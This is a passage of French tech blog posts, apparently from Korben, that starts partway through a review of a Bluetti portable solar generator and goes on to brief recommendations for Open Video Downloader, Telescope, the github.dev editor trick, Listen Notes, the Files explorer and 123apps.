  • cafetière, glacière
  • télévision (ahhh regarder le Tour de France au fin fond de la forêt)
  • masque respiratoire (pour ceux qui font de l’apnée du sommeil)
  • tout autres appareils consommant jusqu’à 300w/heure

Pour vous faire une idée, voici à quoi correspond plus ou moins une charge complète en termes de chiffres concrets : une 40-aine de charges d’un smartphone, 2 jours de lumière faible intensité, une demi-journée d’un mini-frigo, entre 7 et 10 charges de laptop …

Le premier autre avantage auquel j’ai pensé c’est que cela permet de générer un surplus d’électricité de manière ponctuelle ou dans une zone précise. Par exemple pour un cabanon au fond de votre terrain pour lequel vous ne voulez pas faire tirer 200m de câble ni payer une intervention qui coûterait plus cher que le prix des appareils.

Le second c’est bien entendu la portabilité. Pouvoir l’emporter partout avec vous est vraiment pratique dans plusieurs situations : pour les vacances, le camping, si vous menez la van life ou êtes toujours en déplacement, pour générer un surplus d’électricité lors d’un évènement ou d’une soirée en extérieur, pour ne pas dépendre que d’une charge de batterie des outils lorsque vous travaillez loin d’une source d’électricité, etc. 

Utile en cas de panne de courant à la maison. Vous aurez toujours une solution de secours sous la main, plus robuste que les bougies (zavez déjà essayé de recharger votre téléphone à la bougie, c’est long). Vu que le système ne génère pas de bruit ni de fumée, qu’il n’y a pas de combustion d’essence, etc., c’est une solution plutôt safe à utiliser en intérieur.

Le sport. Si vous n’avez pas d’haltères chez vous, vous pouvez toujours vous entraîner à soulever plusieurs fois le groupe électrogène et faire des sauts par-dessus les panneaux. Ben quoi ? Je suis un être humain créatif :p

Mon avis

Alors la luminosité en ce moment, la charge n’a pas été très rapide, mais j’ai vraiment hâte de tester dès qu’il y aura un peu plus de soleil. Le côté portable de la station me permet de l’emmener à l’autre bout du jardin pour pouvoir ensuite y brancher une lampe, une enceinte voire une petite pompe. J’aime beaucoup également la zone de recharge sans fil au-dessus de l’appareil ce qui me permet de charger mon iPhone sans me prendre la tête.

Je n’ai pas encore eu l’occasion de l’emmener dans la voiture, mais si je pratiquais le camping ou la van life, ce serait royal. J’ai essayé de faire tourner le purificateur d’air de Dyson dessus, mais sans surprise, ça n’a pas fonctionné. Je pense que ça tire trop de jus.

Niveau environnement j’avoue ne pas trop savoir ou poser le curseur. D’un côté pouvoir générer de l’énergie renouvelable de cette manière, sans pollution et sur le long terme est une bonne chose. De l’autre il faudrait savoir quel est l’impact écologique dû à la fabrication des différents composants du système et la durée de vie du matériel. Il faudrait donc une étude détaillée et sur la durée pour être fixé.

En attendant ça me fait bien délirer d’apprendre un peu comment fonctionne ce type de système, d’avoir un peu plus d’autonomie en énergie et de vivre avec moins de stress en cas de panne ou de facture EDF impayée 😉

Il va vite devenir mon meilleur ami cet été pour bosser au fond des bois 🙂

Découvrez les produits Bluetti

Une super interface pour Youtube-DL

Par Korben

Si après avoir lu mon formidable article sur la maîtrise de YouTube-dl, vous ne vous en sortez toujours pas, il vous faut une interface graphique !

Et bonne nouvelle, Open Video Downloader est là pour vous servir. Ce logiciel open source qui fonctionne sous macOS, Linux et Windows (car Electron JS ftw) vous permettra de télécharger simplement des vidéos en provenance de YouTube, mais également Vimeo, Twitter et j’en passe.

Il utilise bien sûr Youtube-DL et permet de récupérer soit des vidéos seules, soit carrément des playlists voire l’ensemble du contenu d’une chaine.

Vous pouvez choisir la résolution dans laquelle vous voulez la vidéo, uniquement le son si vous voulez et choper également des vidéos privées grâce au support des cookies.

La GUI est capable de télécharger jusqu’à 32 vidéos en simultanée et comme YouTube DL évolue très vite (car c’est le jeu du chat et de la souris avec les plateformes), et bien Open Video Downloader le mettra à jour automatiquement.

Vous trouverez Open Video Downloader ici.

La recharge sans fil sur la Nintendo Switch Lite

Par Korben

Le youtubeur Robotanv a mis en ligne un genre de tuto vidéo où il explique comment ajouter un module de recharge sans fil dans la dernière Switch Lite de Nintendo.

Ça n’a pas l’air si compliqué que ça puisqu’une fois ouverte, il y a des points de connexions pour le debug juste derrière le port USB-C sur lequel on peut se rebrancher afin d’y connecte le récepteur Qi.

2 petites soudures et c’est plié !

Qui se lance ?

Telescope – Explorez votre documentation / veille via un graphe

Par Korben

Si vous cherchez un nouveau moyen pour faire de la documentation collaborative ou collecter des ressources pour ensuite les connecter en elle sous la forme de graphes, il existe un super projet qui s’appelle Telescope.

Développé par Greaby, ce projet permet ainsi d’agréger de la documentation de manière non hiérarchique. Contrairement à un wiki où tout est lié de manière verticale, avec Telescope, on lie les fiches à l’aide de mots clés, ce qui permet ensuite de générer un graphe.

Ensuite l’exploration de la documentation ou des ressources se faire via le graphe. Telescope est totalement collaboratif et le contenu s’ajoute au format Markdown.

Et parce qu’il est passionné de jeux vidéos, Greaby a créé Galaxy GD à l’aide de Telescope, ce qui permet d’avoir un vrai rendu de ce qu’il est possible de générer comme site statique et surtout de pouvoir jouer avec le fameux graphe.

Ça me fait penser à un vieux service dont le nom m’échappe et qui n’existe plus malheureusement qui permettait d’organiser sa veille de manière thématique dans des bulles. C’était sympa et je pense que Telescope à pas mal d’avenir, car ça permet d’organiser de la veille ou de la documentation de manière très naturelle, très organique.

Plus besoin de se prendre la tête à tout catégoriser de manière hiérarchique, ce qui peut vite devenir compliqué quand on a beaucoup de ressources.

Puis ça permet de faire des liens naturellement entre des sujets. Liens, auxquels on n’aurait pas forcément pensé.

À découvrir ici.

Une astuce pour Github à connaître

Par Korben

Il y a quelques semaines, je partageais avec vous l’existence d’une version 100% en ligne de Visual Studio Code. Et bien il y a encore plus pratique !

Vous voyez, quand vous allez sur un projet Github. Prenons par exemple le projet de YouTube DL. Voici l’URL du dépôt :

https://github.com/ytdl-org/youtube-dl

Et bien il vous suffit simplement de remplacer le .com dans l’URL par un .dev comme ceci :

https://github.dev/ytdl-org/youtube-dl

Et vous tomberez sur un éditeur web Visual Studio qui embarquera tout le projet en question. Apparemment, il y a également un raccourci clavier qui malheureusement ne fonctionne pas chez moi, mais vous pouvez toujours essayer. Il suffit d’appuyer sur la touche « . » (point) de votre clavier pour être redirigé vers l’éditeur.

Dans cet éditeur vous pourrez évidemment consulter l’ensemble des sources du projet, mais également les modifier et pousser vos changements sur le github directement.

Elle n’est pas belle la vie ? Tout est documenté sur le site de Github si vous voulez plus d’infos.

Un grand merci à Olivier pour le partage !

Listen Notes – Le moteur de recherche des podcasts

Par Korben

Êtes-vous amateur de podcasts ? Si oui, vous passez peut-être par des plateformes comme Apple Podcast, Google podcast, Deezer, Spotify…etc.

Mais si vous cherchez un truc spécifique, que ce soit une personne, un sujet…etc., vous passez forcément à côté de plein d’épisodes de plein de podcasts qui ne sont peut-être même pas référencés sur ces plateformes.

Heureusement, il existe un site qui s’appelle Listen Notes qui vous permet tout simplement de faire une rechercher textuelle dans l’offre mondiale de podcasts. À partir de cette recherche, vous pourrez alors écouter des épisodes, découvrir de nouvelles chaines ou playlists mais également (et c’est là que ça devient intéressant), créer un flux RSS auquel vous abonner pour ne rien rater ou exporter la liste des résultats en CSV.

Listen Notes existe également sous la forme d’une API et si vous voulez aller plus loin, il faudra prendre l’abonnement super cher à +10$ la journée.

À découvrir ici.

Files – L’explorateur de fichiers de Windows a trouvé son remplaçant

Par Korben

« Files » est un explorateur de fichiers pour Windows nouvelle génération qui propose une nouvelle expérience en matière de design. A priori, ça ressemble pas mal à l’explorateur de fichiers de Windows, mais il y a pas mal de subtilités comme une intégration avec des services clouds (OneDrive, Google Drive, iCloud…etc) pour gérer directement vos documents ou photos depuis « Files ».

Pour vous faire gagner du temps, Files intègre une fonctionnalité d’aperçu qui vous permet de voir ce qu’il y a dans des documents ou de regarder des photos sans avoir à les ouvrir. Du markdown à la lecture de vidéos, beaucoup de formats sont supportés nativement.

Cet explorateur de fichier permet de tout avoir dans la même fenêtre à l’aide d’un système d’onglet et les raccourcis clavier vous permettront de naviguer entre eux et d’effectuer des actions rapides.

Enfin, vous pourrez également tagger les fichiers et les dossiers avec un nom et une couleur pour pouvoir les identifier facilement. Étant utilisateur de macOS, rien de nouveau sous le soleil, mais pour les utilisateurs de Windows, c’est une révolution !!!

En plus, il y a toute une série de thèmes dispo pour ajouter un peu de couleur et de textures à votre explorateur de fichiers.

L’outil est open source et téléchargeable sur le Windows Store

Modifier, créer et convertir vidéo, sons, documents depuis votre navigateur

Par Korben

Que vous ayez des vidéos à retravailler, des fichiers audio à triturer ou des PDF à manipuler, une seule adresse : 123apps.com

Ce site est un genre de boite à outils en ligne qui permet de faire plein de trucs. Trop de trucs d’ailleurs. Sur la vidéo, il y a un éditeur qui vous permettra de réaliser des choses comme couper la vidéo, la recadrer, changer sa taille, modifier le volume, cacher un logo, ajouter du texte par-dessus, stabiliser une vidéo de fin de soirée…etc.

L’éditeur vidéo est sans doute la partie la plus intéressante de 123apps car il propose des fonctionnalités de base accessibles facilement depuis le navigateur, ce qui vous évitera d’installer un vrai logiciel un peu lourdingue pour un petit recadrage à 2 balles.

Concernant l’audio, 123apps vous permet de fusionner des fichiers, changer le BPM, égaliser le son, enregistrer une voix…etc. Bon pour les PDF c’est comme d’habitude. Fusionner des documents, convertir des JPG/DOC/XLS/PNG…etc. en PDF et vice versa ou encore mettre des mots de passe ou compresser un gros document.

123apps propose également toute une série de convertisseurs (audio, video, image, ebooks…etc.).

Bref, un bon petit site à bookmarker pour vos opérations courantes.

❌